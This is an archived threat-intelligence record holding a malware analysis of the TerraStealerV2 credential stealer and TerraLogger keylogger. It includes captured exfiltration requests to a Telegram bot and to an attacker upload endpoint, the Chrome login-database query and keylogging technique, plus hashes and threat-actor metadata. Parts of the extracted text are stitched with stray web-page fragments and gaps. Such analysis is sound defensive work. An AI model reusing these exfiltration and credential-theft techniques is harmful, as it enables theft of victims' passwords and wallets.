{ "id": "a44bbc02-9cc7-4aa5-bc3d-7117f273dda7", "created_at": "2026-04-06T00:21:04.068502Z", "updated_at": "2026-04-10T03:36:08.256779Z", "deleted_at": null, "sha1_hash": "9cf88beab4e819800a7589f3ee60244aad4c88b6", "title": "Golden Chickens Unveils TerraStealerV2 and TerraLogger: New Credential Theft Tools Identified by Insikt Group", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 915702, "plain_text": "Golden Chickens Unveils TerraStealerV2 and TerraLogger: New\r\nCredential Theft Tools Identified by Insikt Group\r\nBy Insikt Group®\r\nArchived: 2026-04-05 18:10:22 UTC\r\nExecutive Summary\r\nInsikt Group identified two new malware families — TerraStealerV2 and TerraLogger — linked to the financially motivated\r\nthreat actor Golden Chickens (also known as Venom Spider). Golden Chickens is known for operating a Malware-as-a-Service (MaaS) platform used by cybercriminal groups such as FIN 6, Cobalt Group, and Evilnum. The new families,\r\nobserved between January and April 2025, suggest ongoing development aimed at credential theft and keylogging.\r\nTerraStealerV2 is designed to collect browser credentials, cryptocurrency wallet data, and browser extension information.\r\nWhile it targets the Chrome “Login Data” database to steal credentials, it does not bypass Application Bound Encryption\r\n(ABE) protections introduced in Chrome updates after July 2024, indicating the malware code is outdated or still under\r\ndevelopment. Data is exfiltrated to both Telegram and the domain wetransfers[.]io. The stealer has been observed being\r\ndistributed via multiple formats, including LNK, MSI, DLL, and EXE files, and leverages trusted Windows utilities, such as\r\nregsvr32.exe and mshta.exe, to evade detection.\r\nTerraLogger, by contrast, is a standalone keylogger. It uses a common low-level keyboard hook to record keystrokes and\r\nwrites the logs to local files. However, it does not include functionality for data exfiltration or command-and-control (C2)\r\ncommunication, indicating it is either in early development or intended to be a modular part of the Golden Chickens MaaS\r\necosystem.\r\nThe current state of TerraStealerV2 and TerraLogger suggests that both tools remain under active development and do not\r\nyet exhibit the level of stealth typically associated with mature Golden Chickens tooling. Given Golden Chickens’ history of\r\ndeveloping malware for credential theft and access operations, these capabilities will likely continue to evolve.\r\nOrganizations are advised to follow the mitigation guidance provided in this report to reduce the risk of compromise as these\r\nmalware families mature.\r\nKey Findings\r\nInsikt Group identified two new malware families, TerraStealerV2 and TerraLogger, attributed to the threat actor\r\nGolden Chickens. TerraStealerV2 can steal browser credentials and target cryptocurrency wallets, while TerraLogger\r\nfunctions solely as a standalone keylogger module.\r\nTerraLogger is the first observed use of a keylogging capability within malware developed by Golden Chickens.\r\nTerraStealerV2 lacks support for decrypting Chrome ABE-protected credentials, indicating the tool is likely outdated\r\nor still under development.\r\nInsikt Group observed ten distinct TerraStealerV2 distribution samples between January and March 2025 that\r\nemployed varied delivery methods, including MSI, DLL, and LNK files.\r\nBackground\r\nGolden Chickens, also tracked under the alias Venom Spider, is a financially motivated cyber threat actor known for\r\noperating a stealthy and modular malware suite under a MaaS model. Since at least 2018, the Golden Chickens MaaS suite\r\nhas been deployed in campaigns targeting high-value organizations through social engineering vectors, particularly\r\nspearphishing campaigns leveraging fake job offers or resumes. Notably, the malware is used by top-tier cybercrime groups,\r\nincluding Russia-based FIN6 and Cobalt Group, as well as the Belarus-based Evilnum, which has been linked to damages of\r\nover $1.5 billion USD globally.\r\nThe core components of the Golden Chickens MaaS suite are VenomLNK and TerraLoader. Initial infections are typically\r\nachieved through VenomLNK, a malicious Windows shortcut file, which executes TerraLoader, a loader module responsible\r\nfor deploying additional Golden Chickens malware. These modules include TerraStealer for credential harvesting, TerraTV\r\nfor TeamViewer hijacking, and TerraCrypt for ransomware deployment. Additional malware families attributed to the\r\nGolden Chickens ecosystem include TerraRecon for reconnaissance, TerraWiper for data wiping, and lite_more_eggs, as\r\ndepicted in Figure 1 below.\r\nhttps://www.recordedfuture.com/research/terrastealerv2-and-terralogger\r\nPage 1 of 7\n\nFigure 1: Previously reported Golden Chickens malware families (Source: Quo Intelligence)\r\nAttribution efforts by eSentire’s Threat Response Unit have linked Golden Chickens to a threat actor known as\r\nbadbullzvenom, a persona that is believed to be operated jointly by individuals from Moldova and Montreal, Canada. The\r\nthreat actor’s development history demonstrates progress from a low-level forum participant to an established MaaS\r\nprovider. Tools developed by Golden Chickens have been weaponized in several campaigns, including high-profile attacks\r\non British Airways, Newegg, and Ticketmaster UK.\r\nBetween August and October 2024, Zscaler ThreatLabz observed renewed activity attributed to Golden Chickens involving\r\nthe deployment of two newly identified malware families: RevC2 and Venom Loader. These tools were delivered via\r\nVenomLNK campaigns, leveraging social engineering lures like cryptocurrency payment requests and software API\r\ndocumentation. Figure 2 illustrates the attack chain used to deliver RevC2.\r\nFigure 2: Recent Golden Chickens attack chain used to deliver RevC2 (Source: ZScaler)\r\nWhile the initial delivery vector is not known, the infection sequence begins with the execution of a VenomLNK file. This\r\nfile downloads a decoy image consistent with the lure theme (in this case, software API documentation) and initiates RevC2\r\nexecution. Specifically, the LNK file leverages wmic.exe to invoke regsvr32.exe, which loads a malicious OCX payload\r\nhosted on a remote network share.\r\nTechnical Analysis\r\nInsikt Group identified two new malware families attributed to the threat actor group Golden Chickens. The first, tracked as\r\nTerraStealerV2, is a stealer primarily targeting browser credentials, cryptocurrency wallets, and browser extensions. The\r\nsecond, tracked as TerraLogger, is a keylogger observed as a standalone module. The following subsections provide a\r\ndetailed technical analysis of each malware family.\r\nTerraStealerV2\r\nInsikt Group recently identified a new stealer attributed to Golden Chickens, uploaded to Recorded Future Malware\r\nIntelligence on March 3, 2025. A Program Database (PDB) path embedded in the sample (see Figure 3) suggests the threat\r\nactor refers to the malware as NOK; however, Insikt Group tracks it as TerraStealerV2.\r\nC:\\Users\\Admin\\source\\repos\\NOK\\NOK\\x64\\Release\\NOK.pdb\r\nFigure 3: TerraStealerV2 PDB string (Source: Recorded Future)\r\nhttps://www.recordedfuture.com/research/terrastealerv2-and-terralogger\r\nPage 2 of 7\n\n---\nmeta-description: Get my IP Address\n---\nThe stealer is intended to be delivered as an OCX file and executed via regsvr32.exe, which invokes the DllRegisterServer\nexport function. Upon execution, DllRegisterServer first checks that the provided file has a .ocx extension and that the\nfilename ends with a specific hard-coded character or digit (for example, 0.ocx). It then verifies that the file is being run by\nregsvr32.exe before proceeding, as illustrated in Figure 4 below.\nFigure 4: Flow chart illustrating TerraStealerV2’s anti-analysis checks (Source: Recorded Future)\nThe malware then performs string deobfuscation using an XOR decoding routine with a hard-coded key. It collects basic\nhost information by invoking GetUserNameA and GetComputerNameA to retrieve the local user and system names. It then\ndetermines the victim’s IP address by making an HTTP request to ifconfig[.]me. The collected data is subsequently\nexfiltrated via the Telegram messaging platform to a channel named “Noterdam” using a bot token associated with\n“NoterdanssBot,” as shown in Figure 5.\nPOST /\u003c redacted \u003e/sendMessage?chat_id=-4652754121 HTTP/1.1\nHost: api.telegram.org\nAccept: */*\nContent-Length: 24014\nContent-Type: application/x-www-form-urlencoded\nchat_id=-4652754121\u0026text=%2A%2ANew%20User%20Ran%20the%20Application%2A%2A%0A%2A%2AUsername%3A%2A%2A%20Admin%0A%2A%2APC%20Name%3A%2A%2A%20UUHJKMQK%0A%\nFigure 5: TerraStealerV2 exfiltrating initial data to Telegram (Source: Recorded Future)\nURL decoding the message's POST data reveals that the threat actor sends a structured notification to a Telegram channel.\nThe notification, shown in Figure 6, includes an alert indicating a new user ran the application, the collected username and\nsystem name, and the raw HTML response from the ifconfig[.]me request.\n**New User Ran the Application**\n**Username:** Admin\n**PC Name:** UUHJKMQK\n**IP Address:**\n\n---\nmeta-description: Get my IP Address\nmeta-keywords: ip address ifconfig ifconfig.me\n---\nFigure 6: URL-decoded data exfiltrated to Telegram (Source: Recorded Future)\nThe malware then enumerates active processes, searching for instances of chrome.exe; if detected, it attempts to terminate\nthe process using the TerminateProcess Windows API. This behavior is likely intended to release any file locks on Chrome’s\nbrowser database files, ensuring unobstructed access during data extraction. Following this, the malware attempts to extract\nstored credentials and other sensitive data from Chrome and targets specific cryptocurrency wallets and browser extensions.\nThe Chrome browser database theft implementation copies the \"Login Data\" database to C:ProgramData\\Temp\\LoginData\nand then extracts saved logins using a statically linked SQLite library to execute the SQL query SELECT origin_url,\nusername_value, password_value FROM logins. TerraStealerV2 uses SQLite version 3.46.0, which is the same version\nstatically linked in RevC2, suggesting possible code reuse or shared development practices. However, the implementation\ndoes not bypass Chrome’s ABE, meaning collected passwords will not be decrypted for any hosts with Chrome-based\nbrowsers updated since July 24, 2024. This limitation suggests that the stealer code is outdated or still under active\ndevelopment, as effective stealers typically incorporate ABE bypass techniques to extract decrypted credentials from modern\nversions of Chrome or Microsoft Edge.\nExfiltrated browser login data and informational messages are written to C:\\ProgramData\\file.txt and copied to\n%LOCALAPPDATA%\\Packages\\Bay0NsQIzx\\p.txt when stealing operations have completed. If found, targeted browser\nextensions and wallets have their directories copied to %LOCALAPPDATA%\\Packages\\Bay0NsQIzx, and a Telegram\nmessage is sent indicating the number of crypto wallets found. The contents of\n%LOCALAPPDATA%\\Packages\\Bay0NsQIzx are subsequently compressed into an archive named output.zip, located in\nthe same directory. The archive is then exfiltrated to the Telegram bot and a secondary C2 endpoint hosted at\nwetransfers[.]io/uplo.php, as shown in Figure 7. The domain wetransfers[.]io was registered on February 18, 2025, via\nNameCheap, Inc., and is currently hosted behind Cloudflare infrastructure.\nPOST /uplo.php HTTP/1.1\nHost: wetransfers.io\nAccept: */*\nContent-Length: 11252\nContent-Type: multipart/form-data; boundary=------------------------rUxSmqCNbtGx4auL8M41nl\n--------------------------rUxSmqCNbtGx4auL8M41nl\nContent-Disposition: form-data; name=\"zipFile\"; filename=\"output.zip\"\nContent-Type: application/octet-stream\nPK........3.dZ...')...).......p.txt2025-03-04 21:33:38 - Total Browsers 2\nPK..?.......3.dZ...')...).....................p.txtPK..........3...L.....\n--------------------------rUxSmqCNbtGx4auL8M41nl\nContent-Disposition: form-data; name=\"pcname\"\nUUHJKMQK\n--------------------------rUxSmqCNbtGx4auL8M41nl\nContent-Disposition: form-data; name=\"username\"\nAdmin\n--------------------------rUxSmqCNbtGx4auL8M41nl\nContent-Disposition: form-data; name=\"totalwallets\"\n0\n--------------------------rUxSmqCNbtGx4auL8M41nl\nContent-Disposition: form-data; name=\"ip\"\n\nresource hosted on the same domain leveraged for data exfiltration — using either curl or PowerShell, and subsequently\r\nexecuted via regsvr32.exe (see Figure 8).\r\nFigure 8: TerraStealerV2 distribution samples attack chain (Source: Recorded Future)\r\nTable 1 lists distribution samples, including their filenames, compilation timestamps, and the corresponding TerraStealerV2\r\npayloads Golden Chickens have been observed deploying. One LNK file (SHA-256:\r\n9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a) appears to overlap with the activity cluster\r\ntracked as ClickFix. In this case, the LNK file dropped a payload masquerading as an MP4 file, which was executed via\r\nmshta.exe — a technique consistent with previously observed tactics in ClickFix campaigns.\r\nTerraStealerV2 Distribution Filename\r\nCompilation/First\r\nSubmitted\r\nTimestamp\r\nTerraStealerV2 Loaded\r\n9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a olala.lnk\r\n2025-01-03 03:32\r\nUTC\r\n828eee78537e49b46e34a\r\n58b324d37bbf6d706b0fe5dbb8bca92d9628a9c394ca81121cea1690a16a3afa 1.exe\r\n2025-01-29\r\n05:41:34 UTC\r\n151a83f0b54d23d84fb15\r\n63fb3ed0aba87917847ad256c4e89f7b250adc6e2eac74023bb52e091ab0ef97 BundleInstaller.dll\r\n2025-02-18\r\n22:20:54 UTC\r\n151a83f0b54d23d84fb15\r\n4b6fa036aceb1e2149848ff46c4e1a6a89eee3b7d59769634ce9127fdaa96234 setup.msi\r\n2025-02-19\r\n12:44:27 UTC\r\n151a83f0b54d23d84fb15\r\n14d9d56bc4c17a971a9d69b41a4663ab7eb2ca5b52d860f9613823101f072c31 setup.msi\r\n2025-02-19\r\n13:22:37 UTC\r\nd6246e4f0425b38a26298\r\n1ed9368d5ac629fa2e7e81516e4520f02eb970d010d3087e902cd4f2e35b1752 setup.msi\r\n2025-02-19\r\n19:26:03 UTC\r\n151a83f0b54d23d84fb15\r\n766690a09ec97e414e732d16b99b19389a91835abc15684cc0f1aba2ca93cf98 hyhyhy.lnk\r\n2025-02-28, 07:40\r\nUTC\r\n828eee78537e49b46e34a\r\n313203cb71acd29e6cc542bf57f0e90ce9e9456e2483a20418c8f17b7afe0b57 1.exe\r\n2025-03-03\r\n13:51:40 UTC\r\na2f7d83ddbe0aeba5f5113\r\nde6ed44d21e5bc9bc5c1c51f33760a5d96378308d02c2c81ef2d75e7a201fb63 1.exe\r\n2025-03-03\r\n13:51:40 UTC\r\na2f7d83ddbe0aeba5f5113\r\nTable 1: Samples used to distribute TerraStealerV2 (Source: Recorded Future)\r\nInsikt Group identified a new keylogger associated with Golden Chickens, which was uploaded to Recorded Future\r\nMalware Intelligence on January 13, 2025. Insikt Group tracks this family as TerraLogger and has identified five distinct\r\nsamples. Four samples operate as intended and contain an identical PDB string, shown in Figure 9 below. The remaining\r\nsample does not include this PDB string and instead uses the same PDB path as TerraStealerV2 (see Figure 3 above). This\r\nhttps://www.recordedfuture.com/research/terrastealerv2-and-terralogger\r\nPage 5 of 7\n\noutlier appears to be a developer test, using the same string-encoding method as TerraStealerV2; however, it fails during\r\nexecution due to a crash while initializing keylogger-related strings, which prevents the malware from reaching its primary\r\nentry point.\r\nC:\\Users\\PC\\Downloads\\Projector\\Projector\\x64\\Release\\Projector.pdb\r\nFigure 9: TerraLogger PDB string (Source: Recorded Future)\r\nTerraLogger is typically delivered as an OCX file and employs the same initial execution checks as TerraStealerV2. It is\r\nintended to be executed via regsvr32.exe, which invokes the DllRegisterServer export function. Upon execution, it first\r\nchecks that the provided file has a .ocx extension and that the filename ends with a hard-coded character or digit (such as\r\n0.ocx). It then verifies that it is being run by regsvr32.exe before proceeding. If the initial execution checks pass,\r\nTerraLogger opens a file handle to log keystrokes.\r\nInsikt Group identified multiple file paths across the five identified samples, with logs written to files such as a.txt, f.txt,\r\nop.txt, or save.txt located in the C:\\ProgramData folder. The malware implements its keylogger using a commonly observed\r\ntechnique by installing a WH_KEYBOARD_LL hook using SetWindowsHookExA, registering the fn callback function\r\n(shown in Figure 10) to intercept and process message events, enabling keyboard activity to be captured.\r\nFigure 10: Keylogger callback function (Source: Recorded Future)\r\nKeystrokes are written to the open log file within the mw_log_key function. This function first retrieves the title of the\r\ncurrent foreground window, then appends a line separator followed by the intercepted keystrokes. It contains logic to handle\r\nspecial characters, such as semicolons, brackets, and quotes, and checks the state of the Shift key to determine the correct\r\ncharacter to log. If a keycode does not match any known special keys, it is written in \u003cKEY-[keycode]\u003e format. An example\r\nof a resulting log file is shown in Figure 11.\r\nFigure 11: Keylogger log file example (Source: Recorded Future)\r\nTable 2 lists the five TerraLogger keylogger samples identified and summarizes the differences across versions. Compilation\r\ntimestamps indicate that the first version was built on January 13, 2025, and that the most recent sample was compiled on\r\nApril 1, 2025. These samples reflect minor, incremental updates, suggesting active development. Notable changes include\r\nhttps://www.recordedfuture.com/research/terrastealerv2-and-terralogger\r\nPage 6 of 7\n\nmodifications to the file path used for storing keystroke logs and a shift in how special keys are represented — from angle-bracketed, uppercase tokens (for example, , ) to pipe-delimited, lowercase abbreviations (for example, |bck|, |sft|).\r\nSample\r\nCompile\r\nTime\r\nSave Path\r\nSpecial\r\nKeys\r\nCapitalized\r\nSpecial\r\nKeys\r\nAbbreviated\r\n067421234fdd631628569bd86b6757ce4c78139c3609493c92db7b096b0c22f4\r\n2025-\r\n01-13\r\n14:16:35\r\nUTC\r\nc:\\programdata\\save.txt ✔\r\n315e0c9f0dbfa662327c57a570bcafc79b1ba816deb9647fd8da5dc6dc1e8808\r\n2025-\r\n02-06\r\n09:00:22\r\nUTC\r\nc:\\programdata\\save.txt ✔\r\nf06097b6f4bf86ad00c8f7115d538823a73e531b0f06b66f63f9c70e47f4ea98\r\n2025-\r\n03-11\r\n14:39:27\r\nUTC\r\nc:\\programdata\\op.txt ✔\r\n852879a9832cd13cbc9510503abf9b0906bb5e08e5ffae74381aaca3c502d826\r\n2025-\r\n03-11\r\n14:42:11\r\nUTC\r\nc:\\programdata\\a.txt ✔\r\n81117772d2b1997f4e280c3add3b56c128444ba05ec4eaaf2293ef8ff1c76257\r\n2025-\r\n04-01\r\n15:54:57\r\nUTC\r\nc:\\programdata\\f.txt ✔\r\nTable 2: Comparison of standalone TerraLogger sample changes (Source: Recorded Future)\r\n—\r\nTo read the entire analysis, click here to download the report as a PDF.\r\nSource: https://www.recordedfuture.com/research/terrastealerv2-and-terralogger\r\nhttps://www.recordedfuture.com/research/terrastealerv2-and-terralogger\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.recordedfuture.com/research/terrastealerv2-and-terralogger" ], "report_names": [ "terrastealerv2-and-terralogger" ], "threat_actors": [ { "id": "059b16f8-d4e0-4399-9add-18101a2fd298", "created_at": "2022-10-25T15:50:23.29434Z", "updated_at": "2026-04-10T02:00:05.380938Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "Evilnum" ], "source_name": "MITRE:Evilnum", "tools": [ "More_eggs", "EVILNUM", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "12517c87-040a-4627-a3df-86ca95e5c13f", "created_at": "2022-10-25T16:07:23.61665Z", "updated_at": "2026-04-10T02:00:04.689Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "ATK 88", "Camouflage Tempest", "FIN6", "G0037", "Gold Franklin", "ITG08", "Skeleton Spider", "Storm-0538", "TAAL", "TAG-CR2", "White Giant" ], "source_name": "ETDA:FIN6", "tools": [ "AbaddonPOS", "Agentemis", "AmmyyRAT", "Anchor_DNS", "BlackPOS", "CmdSQL", "Cobalt Strike", "CobaltStrike", "FlawedAmmyy", "FrameworkPOS", "Grateful POS", "JSPSPY", "Kaptoxa", "LOLBAS", "LOLBins", "Living off the Land", "LockerGoga", "MMon", "Magecart", "Meterpreter", "Mimikatz", "More_eggs", "NeverQuest", "POSWDS", "Reedum", "Ryuk", "SCRAPMINT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Terra Loader", "TerraStealer", "Vawtrak", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "cobeacon", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f5c90ccc-0f18-4e07-a246-b62101ab2f6f", "created_at": "2023-01-06T13:46:38.854407Z", "updated_at": "2026-04-10T02:00:03.122844Z", "deleted_at": null, "main_name": "GC02", "aliases": [ "Golden Chickens", "Golden Chickens02", "Golden Chickens 02" ], "source_name": "MISPGALAXY:GC02", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f2fa9952-301f-4376-ac69-743d6f2bec1e", "created_at": "2023-01-06T13:46:39.122721Z", "updated_at": "2026-04-10T02:00:03.22231Z", "deleted_at": null, "main_name": "VENOM SPIDER", "aliases": [ "badbullz", "badbullzvenom" ], "source_name": "MISPGALAXY:VENOM SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9", "created_at": "2022-10-25T15:50:23.317961Z", "updated_at": "2026-04-10T02:00:05.280403Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest" ], "source_name": "MITRE:FIN6", "tools": [ "FlawedAmmyy", "GrimAgent", "FrameworkPOS", "More_eggs", "Cobalt Strike", "Windows Credential Editor", "AdFind", "PsExec", "LockerGoga", "Ryuk", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e", "created_at": "2024-06-19T02:03:08.052814Z", "updated_at": "2026-04-10T02:00:03.659971Z", "deleted_at": null, "main_name": "GOLD FRANKLIN", "aliases": [ "FIN6 ", "ITG08 ", "MageCart Group 6 ", "Skeleton Spider ", "Storm-0538 ", "White Giant " ], "source_name": "Secureworks:GOLD FRANKLIN", "tools": [ "FrameWorkPOS", "Metasploit", "Meterpreter", "Mimikatz", "PowerSploit", "PowerUpSQL", "RemCom" ], "source_id": "Secureworks", "reports": null }, { "id": "88802a4b-5b3d-42ee-99e6-8a4f5fd231f6", "created_at": "2023-01-06T13:46:38.851345Z", "updated_at": "2026-04-10T02:00:03.121861Z", "deleted_at": null, "main_name": "GC01", "aliases": [ "Golden Chickens", "Golden Chickens01", "Golden Chickens 01" ], "source_name": "MISPGALAXY:GC01", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51", "created_at": "2022-10-25T16:07:23.474746Z", "updated_at": "2026-04-10T02:00:04.623746Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "ATK 67", "Cobalt Gang", "Cobalt Spider", "G0080", "Gold Kingswood", "Mule Libra", "TAG-CR3" ], "source_name": "ETDA:Cobalt Group", "tools": [ "ATMRipper", "ATMSpitter", "Agentemis", "AmmyyRAT", "AtNow", "COOLPANTS", "CobInt", "Cobalt Strike", "CobaltStrike", "Cyst Downloader", "Fareit", "FlawedAmmyy", "Formbook", "Little Pig", "Metasploit Stager", "Mimikatz", "More_eggs", "NSIS", "Nullsoft Scriptable Install System", "Pony Loader", "Ripper ATM", "SDelete", "Siplog", "SoftPerfect Network Scanner", "SpicyOmelette", "Taurus Builder", "Taurus Builder Kit", "Taurus Loader", "Terra Loader", "ThreatKit", "VenomKit", "cobeacon", "win.xloader" ], "source_id": "ETDA", "reports": null }, { "id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd", "created_at": "2023-01-06T13:46:39.153487Z", "updated_at": "2026-04-10T02:00:03.232006Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "EvilNum", "Jointworm", "KNOCKOUT SPIDER", "DeathStalker", "TA4563" ], "source_name": "MISPGALAXY:Evilnum", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ee3363a4-e807-4f95-97d8-b603c31b9de1", "created_at": "2023-01-06T13:46:38.485884Z", "updated_at": "2026-04-10T02:00:02.99385Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "SKELETON SPIDER", "ITG08", "MageCart Group 6", "ATK88", "TA4557", "Storm-0538", "White Giant", "GOLD FRANKLIN", "G0037", "Camouflage Tempest" ], "source_name": "MISPGALAXY:FIN6", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "39ea99fb-1704-445d-b5cd-81e7c99d6012", "created_at": "2022-10-25T16:07:23.601894Z", "updated_at": "2026-04-10T02:00:04.684134Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "G0120", "Jointworm", "Operation Phantom in the [Command] Shell", "TA4563" ], "source_name": "ETDA:Evilnum", "tools": [ "Bypass-UAC", "Cardinal RAT", "ChromeCookiesView", "EVILNUM", "Evilnum", "IronPython", "LaZagne", "MailPassView", "More_eggs", "ProduKey", "PyVil", "PyVil RAT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraPreter", "TerraStealer", "TerraTV" ], "source_id": "ETDA", "reports": null }, { "id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242", "created_at": "2022-10-25T15:50:23.744036Z", "updated_at": "2026-04-10T02:00:05.294413Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "Cobalt Group", "GOLD KINGSWOOD", "Cobalt Gang", "Cobalt Spider" ], "source_name": "MITRE:Cobalt Group", "tools": [ "Mimikatz", "More_eggs", "SpicyOmelette", "SDelete", "Cobalt Strike", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "7a257844-df90-4bd4-b0f1-77d00ff82802", "created_at": "2022-10-25T16:07:24.376356Z", "updated_at": "2026-04-10T02:00:04.964565Z", "deleted_at": null, "main_name": "Venom Spider", "aliases": [ "Golden Chickens", "TA4557", "Venom Spider" ], "source_name": "ETDA:Venom Spider", "tools": [ "More_eggs", "PureLocker", "SONE", "SpicyOmelette", "StealerOne", "Taurus Builder", "Taurus Builder Kit", "Taurus Loader", "Taurus Loader Reconnaissance Module", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraCrypt", "TerraLogger", "TerraPreter", "TerraRecon", "TerraStealer", "TerraTV", "TerraWiper", "ThreatKit", "VenomKit", "VenomLNK", "lite_more_eggs" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434864, "ts_updated_at": 1775792168, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9cf88beab4e819800a7589f3ee60244aad4c88b6.pdf", "text": "https://archive.orkl.eu/9cf88beab4e819800a7589f3ee60244aad4c88b6.txt", "img": "https://archive.orkl.eu/9cf88beab4e819800a7589f3ee60244aad4c88b6.jpg" } }